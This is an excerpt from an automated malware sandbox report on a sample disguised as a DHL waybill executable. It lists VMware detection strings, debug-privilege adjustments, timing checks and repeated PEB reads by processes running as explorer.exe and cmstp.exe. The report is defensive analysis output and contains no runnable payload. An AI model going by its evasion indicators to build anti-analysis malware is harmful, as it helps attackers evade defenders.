          Source: explorer.exe, 00000008.00000000.430072276.0000000006153000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000008.00000000.434708210.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000I
          Source: explorer.exe, 00000008.00000000.434708210.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000008.00000000.455709980.0000000004347000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}3
          Source: explorer.exe, 00000008.00000000.476095288.00000000042EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q^
          Source: DHL WB# 2343640950.exe, 00000000.00000002.423321322.0000000002797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000008.00000000.543849828.00000000042A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000O
          Source: DHL WB# 2343640950.exe, 00000000.00000002.423321322.0000000002797000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeCode function: 0_2_002BB65D rdtsc
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\DHL WB# 2343640950.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046C746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04771074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04762073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0473C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0473C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04774015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04774015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04727016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04727016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04727016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04726C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04726C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04726C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04726C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0477740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0477740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0477740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04726CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04726CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04726CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_047614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04778CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0473B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0473B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0473B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0473B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0473B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0473B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04723884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04723884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046AC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04723540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046C7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04778D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0472A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046C4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046AAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04758DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0476FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0476FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0476FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0476FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_047341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04726DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04726DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04726DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04726DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04726DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04726DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_047251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_047251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_047251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_047251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_047269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_047705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_047705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046CC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0475B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0475B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04778A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0476EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04734257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0475FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046AE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046C3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04761608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046B76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04778ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046D2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046E8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0475FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04770EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04770EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_04770EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_047246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_0473FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046ADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 13_2_046BFF60 mov eax, dword ptr fs:[00000030h]
